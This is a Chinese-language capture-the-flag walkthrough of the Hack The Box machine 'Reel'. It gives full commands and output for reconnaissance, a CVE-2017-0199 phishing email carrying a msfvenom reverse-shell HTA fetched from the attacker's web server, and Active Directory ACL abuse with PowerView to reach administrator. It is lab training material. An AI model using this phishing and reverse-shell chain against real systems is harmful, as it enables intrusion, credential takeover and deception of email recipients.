nmap -A -T4 10.10.10.77
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-18 01:30 EST
Nmap scan report for 10.10.10.77
Host is up (0.55s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_05-28-18 11:19PM <DIR> documents
| ftp-syst:
|_ SYST: Windows_NT
22/tcp open ssh OpenSSH 7.6 (protocol 2.0)
| ssh-hostkey:
| 2048 8220c3bd16cba29c88871d6c1559eded (RSA)
| 256 232bb80a8c1cf44d8d7e5e6458803345 (ECDSA)
|_ 256 ac8bde251db7d838389b9c16bff63fed (ED25519)
25/tcp open smtp?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, X11Probe:
| 220 Mail Service ready
| FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest:
| 220 Mail Service ready
| sequence of commands
| sequence of commands
| Hello:
| 220 Mail Service ready
| EHLO Invalid domain address.
| Help:
| 220 Mail Service ready
| DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
| SIPOptions:
| 220 Mail Service ready
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| TerminalServerCookie:
| 220 Mail Service ready
|_ sequence of commands
| smtp-commands: REEL, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port25-TCP:V=7.93%I=7%D=1/18%Time=63C79217%P=x86_64-pc-linux-gnu%r(NULL
SF:,18,"220\x20Mail\x20Service\x20ready\r\n")%r(Hello,3A,"220\x20Mail\x20S
SF:ervice\x20ready\r\n501\x20EHLO\x20Invalid\x20domain\x20address\.\r\n")%
SF:r(Help,54,"220\x20Mail\x20Service\x20ready\r\n211\x20DATA\x20HELO\x20EH
SF:LO\x20MAIL\x20NOOP\x20QUIT\x20RCPT\x20RSET\x20SAML\x20TURN\x20VRFY\r\n"
SF:)%r(GenericLines,54,"220\x20Mail\x20Service\x20ready\r\n503\x20Bad\x20s
SF:equence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20commands\r
SF:\n")%r(GetRequest,54,"220\x20Mail\x20Service\x20ready\r\n503\x20Bad\x20
SF:sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20commands\
SF:r\n")%r(HTTPOptions,54,"220\x20Mail\x20Service\x20ready\r\n503\x20Bad\x
SF:20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20command
SF:s\r\n")%r(RTSPRequest,54,"220\x20Mail\x20Service\x20ready\r\n503\x20Bad
SF:\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20comma
SF:nds\r\n")%r(RPCCheck,18,"220\x20Mail\x20Service\x20ready\r\n")%r(DNSVer
SF:sionBindReqTCP,18,"220\x20Mail\x20Service\x20ready\r\n")%r(DNSStatusReq
SF:uestTCP,18,"220\x20Mail\x20Service\x20ready\r\n")%r(SSLSessionReq,18,"2
SF:20\x20Mail\x20Service\x20ready\r\n")%r(TerminalServerCookie,36,"220\x20
SF:Mail\x20Service\x20ready\r\n503\x20Bad\x20sequence\x20of\x20commands\r\
SF:n")%r(TLSSessionReq,18,"220\x20Mail\x20Service\x20ready\r\n")%r(Kerbero
SF:s,18,"220\x20Mail\x20Service\x20ready\r\n")%r(SMBProgNeg,18,"220\x20Mai
SF:l\x20Service\x20ready\r\n")%r(X11Probe,18,"220\x20Mail\x20Service\x20re
SF:ady\r\n")%r(FourOhFourRequest,54,"220\x20Mail\x20Service\x20ready\r\n50
SF:3\x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\
SF:x20commands\r\n")%r(LPDString,18,"220\x20Mail\x20Service\x20ready\r\n")
SF:%r(LDAPSearchReq,18,"220\x20Mail\x20Service\x20ready\r\n")%r(LDAPBindRe
SF:q,18,"220\x20Mail\x20Service\x20ready\r\n")%r(SIPOptions,162,"220\x20Ma
SF:il\x20Service\x20ready\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n5
SF:03\x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of
SF:\x20commands\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\
SF:x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20comman
SF:ds\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequenc
SF:e\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n503\
SF:x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x2
SF:0commands\r\n");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2012 (91%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (91%), Microsoft Windows Server 2012 R2 (91%), Microsoft Windows 7 Professional (86%), Microsoft Windows 8.1 Update 1 (85%), Microsoft Windows Phone 7.5 or 8.0 (85%), Microsoft Windows 7 or Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 or Windows 8.1 (85%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
TRACEROUTE (using port 25/tcp)
HOP RTT ADDRESS
1 636.94 ms 10.10.16.1
2 637.07 ms 10.10.10.77
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 246.69 seconds
发现是一台Windows Server 2012主机且开放了ftp、ssh、smtp协议
尝试登录ftp、ssh
发现可以匿名登录ftp
ftp 10.10.10.77
Connected to 10.10.10.77.
220 Microsoft FTP Service
Name (10.10.10.77:kali): ftp
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
229 Entering Extended Passive Mode (|||41001|)
125 Data connection already open; Transfer starting.
05-28-18 11:19PM <DIR> documents
226 Transfer complete.
ftp>
信息收集
收集发现一下文件并进行下载
ftp> dir
229 Entering Extended Passive Mode (|||41007|)
125 Data connection already open; Transfer starting.
05-28-18 11:19PM 2047 AppLocker.docx
05-28-18 01:01PM 124 readme.txt
10-31-17 09:13PM 14581 Windows Event Forwarding.docx
226 Transfer complete.
ftp> get readme.txt
local: readme.txt remote: readme.txt
229 Entering Extended Passive Mode (|||41008|)
150 Opening ASCII mode data connection.
100% |*******************************| 124 0.19 KiB/s 00:00 ETA
226 Transfer complete.
124 bytes received in 00:00 (0.13 KiB/s)
ftp> get Windows\ Event\ Forwarding.docx
local: Windows Event Forwarding.docx remote: Windows Event Forwarding.docx
229 Entering Extended Passive Mode (|||41010|)
150 Opening ASCII mode data connection.
100% |*******************************| 14581 14.21 KiB/s 00:00 ETAftp: Reading from network: Interrupted system call
0% | | -1 0.00 KiB/s --:-- ETA
226 Transfer complete.
WARNING! 51 bare linefeeds received in ASCII mode.
File may not have transferred correctly.
ftp> dir
229 Entering Extended Passive Mode (|||41011|)
125 Data connection already open; Transfer starting.
05-28-18 11:19PM 2047 AppLocker.docx
05-28-18 01:01PM 124 readme.txt
10-31-17 09:13PM 14581 Windows Event Forwarding.docx
226 Transfer complete.
ftp> get AppLocker.docx
local: AppLocker.docx remote: AppLocker.docx
229 Entering Extended Passive Mode (|||41012|)
150 Opening ASCII mode data connection.
100% |*******************************| 2047 2.27 KiB/s 00:00 ETA
226 Transfer complete.
WARNING! 9 bare linefeeds received in ASCII mode.
File may not have transferred correctly.
2047 bytes received in 00:01 (1.70 KiB/s)
ftp> exit
221 Goodbye.
使用exiftool查看"Windows Event Forwarding.docx"源数据
命令:exiftool "Windows Event Forwarding.docx"
回显:
ExifTool Version Number : 12.49
File Name : Windows Event Forwarding.docx
Directory : .
File Size : 15 kB
File Modification Date/Time : 2023:01:18 01:58:38-05:00
File Access Date/Time : 2023:01:18 01:59:18-05:00
File Inode Change Date/Time : 2023:01:18 01:58:38-05:00
File Permissions : -rw-r--r--
File Type : DOCX
File Type Extension : docx
MIME Type : application/vnd.openxmlformats-officedocument.wordprocessingml.document
Zip Required Version : 20
Zip Bit Flag : 0x0006
Zip Compression : Deflated
Zip Modify Date : 1980:01:01 00:00:00
Zip CRC : 0x82872409
Zip Compressed Size : 385
Zip Uncompressed Size : 1422
Zip File Name : [Content_Types].xml
Creator : nico@megabank.com
Revision Number : 4
Create Date : 2017:10:31 18:42:00Z
Modify Date : 2017:10:31 18:51:00Z
Template : Normal.dotm
Total Edit Time : 5 minutes
Pages : 2
Words : 299
Characters : 1709
Application : Microsoft Office Word
Doc Security : None
Lines : 14
Paragraphs : 4
Scale Crop : No
Heading Pairs : Title, 1
Titles Of Parts :
Company :
Links Up To Date : No
Characters With Spaces : 2004
Shared Doc : No
Hyperlinks Changed : No
App Version : 14.0000
发现nico@megabank.com邮箱
尝试通过邮箱进行网络钓鱼获得shell
使用的CVE:
CVE-2017-0199
下载:
https://github.com/bhdresh/CVE-2017-0199
简单说明:
CVE-2017-0199是Microsoft Office在OLE处理机制实现上存在的一个逻辑漏洞,
此漏洞的成因主要是word在处理内嵌OLE2LIN对象时,通过网络更新对象时没有
正确处理Content-Type所导致的一个逻辑漏洞。由于逻辑漏洞的成因,就导致利用
该漏洞时不需要绕过微软采用的一系列诸如ASLR、DEP之类的漏洞缓解措施,因此成功率非常高
msf生成shell马
命令:
msfvenom -p windows/shell_reverse_tcp lhost=10.10.16.13 lport=6666 -f hta-psh -o shell.hta
使用python开启http服务用于远程文件加载
命令:
python3 -m http.server 80
生成rft载荷文档
命令:
python2 cve-2017-0199_toolkit.py -M gen -w hi.rtf -u http://10.10.16.13/shell.hta -t rtf -x 0
开启nc用于反弹shell接收
命令:
nc -nvlp 6666
sendemail向目标邮箱发送载荷文件
命令:
sendEmail -f mac@megabank.com -t nico@megabank.com -u "Invoice Attached" -m "You are overdue payment" -a hi.rtf -s 10.10.10.77 -v
回显:
Jan 18 03:59:55 kali sendEmail[40007]: DEBUG => Connecting to 10.10.10.77:25
Jan 18 03:59:55 kali sendEmail[40007]: DEBUG => My IP address is: 10.10.16.13
Jan 18 03:59:55 kali sendEmail[40007]: SUCCESS => Received: 220 Mail Service ready
Jan 18 03:59:55 kali sendEmail[40007]: INFO => Sending: EHLO kali
Jan 18 03:59:56 kali sendEmail[40007]: SUCCESS => Received: 250-REEL, 250-SIZE 20480000, 250-AUTH LOGIN PLAIN, 250 HELP
Jan 18 03:59:56 kali sendEmail[40007]: INFO => Sending: MAIL FROM:<mac@megabank.com>
Jan 18 03:59:56 kali sendEmail[40007]: SUCCESS => Received: 250 OK
Jan 18 03:59:56 kali sendEmail[40007]: INFO => Sending: RCPT TO:<nico@megabank.com>
Jan 18 03:59:57 kali sendEmail[40007]: SUCCESS => Received: 250 OK
Jan 18 03:59:57 kali sendEmail[40007]: INFO => Sending: DATA
Jan 18 03:59:57 kali sendEmail[40007]: SUCCESS => Received: 354 OK, send.
Jan 18 03:59:57 kali sendEmail[40007]: INFO => Sending message body
Jan 18 03:59:57 kali sendEmail[40007]: Setting content-type: text/plain
Jan 18 03:59:57 kali sendEmail[40007]: DEBUG => Sending the attachment [hi.rtf]
Jan 18 04:00:09 kali sendEmail[40007]: SUCCESS => Received: 250 Queued (12.156 seconds)
Jan 18 04:00:09 kali sendEmail[40007]: Email was sent successfully! From: <mac@megabank.com> To: <nico@megabank.com> Subject: [Invoice Attached] Attachment(s): [hi.rtf] Server: [10.10.10.77:25]
过一段时间后nc获得shell
python http被访问:
python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.77 - - [18/Jan/2023 04:00:25] "GET /shell.hta HTTP/1.1" 200 -
10.10.10.77 - - [18/Jan/2023 04:00:26] "GET /shell.hta HTTP/1.1" 200 -
nc获得shell
nc -nvlp 6666
listening on [any] 6666 ...
connect to [10.10.16.13] from (UNKNOWN) [10.10.10.77] 60488
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
获取user旗帜
C:\Users\nico\Desktop>type user.txt
使用msf代替nc获取shell
msfconsole
msf > use exploit/windows/fileformat/office_word_hta
msf > set lhost 10.10.14.17
msf > set lport 4444
msf > set srvhost 10.10.14.17
msf > run
sendEmail -f mac@megabank.com -t nico@megabank.com -u "Invoice Attached" -m "You are overdue payment" -a /root/.msf4/local/msf.doc -s 10.10.10.77 -v
发现一下关键信息:
claire@HTB.LOCAL USER tom@HTB.LOCAL USER WriteOwner AccessAllowed FALSE
Backup_Admins@HTB.LOCAL GROUP claire@HTB.LOCAL USER WriteDacl AccessAllowed FALSE
tom@HTB.LOCA具有对claire@HTB.LOCAL账号WriteOwner权限,claire@HTB.LOCAL账号对 Backup_Admins@HTB.LOCAL具有WriteDacl权限。
权限提升
使用PowerView进行权限滥用提权
下载:https://github.com/PowerShellMafia/PowerSploit
所在目录:PowerSploit-master\PowerSploit-master\Recon
利用方式:
. .\PowerView.ps1 //将PowerView导入
把当前用户tom设置为claire用户的 ACL 的所有者并授予其修改密码的权限
Set-DomainObjectOwner -Identity claire -OwnerIdentity tom
Add-DomainObjectAcl -TargetIdentity claire -PrincipalIdentity tom -Rights ResetPassword -Verbose
设置claire的密码为Ab345678123!@#
$cred = ConvertTo-SecureString "Ab345678123!@#" -AsPlainText -force
Set-DomainUserPassword -identity claire -accountpassword $cred
ssh登录
ssh claire@10.129.5.10
查看backup_admins组发现只有ranj用户
net group backup_admins
将claire用户添加到backup_admins用户组下之后重新登录
net group backup_admins claire /add
net group backup_admins
在备份目录Backup Scripts中遍历密码,成功找到administrator密码Cr4ckMeIfYouC4n!获取到system权限